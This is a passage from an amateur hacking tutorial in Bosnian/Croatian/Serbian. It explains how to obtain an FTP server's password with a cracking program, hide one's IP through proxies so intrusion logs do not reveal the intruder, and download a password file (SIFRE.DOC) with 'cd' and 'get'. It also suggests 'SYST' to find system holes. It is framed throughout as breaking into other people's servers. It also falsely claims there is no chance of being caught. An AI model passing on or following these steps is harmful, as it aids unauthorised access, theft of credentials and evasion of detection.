svrhe, a zove se Crack FTP. O samom programu ne trebam mnogo
pričati jer je veoma jednostavan za korištenje. Potrebno je samo
 unijeti adresu FTP servera, kliknete na CRACK i sačekate da vam
se pojavi password FTP servera.

Dakle uspjeli smo sada nabaviti password i upašćemo u FTP

server, ali tu nastaje jedan problem. Svaki upad u FTP server
ostavlja log na kojem se vidi da je neko ušao u server. Točnije u
logu se vidi naša IP adresa, a ukoliko neko zna našu IP adresu,
vrlo lako će nas uhvatiti. Najbolji način za sakrivanje IP adrese je
korištenje Firewall-a, WinGate-a, Proxy-a. Ukoliko neznate šta je
to, evo malog objašnjenja u nekoliko crta. Proxy je zapravo server
na koji se mi spajamo i koji nam daje lažnu IP adresu tj. adresu
proxy servera tako da će se, ukoliko upadnemo u FTP server, u
logovima pojaviti adresa proxy servera umjesto naše. Sve ovo radi
na slijedećem principu:

Localhost --> Proxy Server --> FTP Server --> Proxy Server -->
Localhost

Pošto predpostavljam da nikad niste koristili neki od proxy

servera, moraćete iskoristiti program koji se naziva Proxy
Redirect. Sam program je veoma jednostavan i dolazi sa velikom
listom proxy servera. Također i vi sami možete pronaći proxy
servere ako u Google-u ili Yahoo-u utipkate 'proxy server'. Uz
pomoć ovog programa bićete potpuno zaštićeni i ne postoje
nikakve šanse da budete uhvaćeni. Detaljno objašnjenje o ovom
programu nalazi se u njegovom Readme.Txt fajlu.

Sada smo totalno spremni za upad u FTP server. Dakle, pokrenuli

smo proxy server, spojili se na FTP server i šta sada? Sada je
veoma jednostavno! Recimo da želimo doći do određenog fajla koji
se naziva SIFRE.DOC i koji se nalazi u direktoriju PASS. Da bi ovo
uradili pratite slijedeći postupak:

ftp> cd pass
Ovom komandom ući ćemo u direktorij (folder) pod imenom pass.
Pošto se sada nalazimo u folderu u kojem se nalazi željeni fajl koji
zelimo downloadirati, potrebno je izvesti slijedeći korak:

ftp> get SIFRE.DOC

Ovime smo otpočeli download našeg željenog fajla.

Ukoliko želimo vidjeti spisak svih fajlova i direktorija na serveru

unesite samo komandu DIR i spisak će vam se pojaviti. Nakon što
smo downloadirali željeni fajl sa servera utipkat ćemo
DISCONNECT kako bi se diskonektirali tj. kako bi napustili FTP
server.

Također bih trebalo spomenuti i komandu SYST koja je veoma

interesantna. Naime, ona služi za prikaz informacija o sistemu FTP
servera tj. informacija o operativnom sistemu i verziji FTP-a.
Ukoliko to znamo možemo pronaći određeni propust (rupu) u
sistemu, ali o tome ćemo nekom drugom prilikom.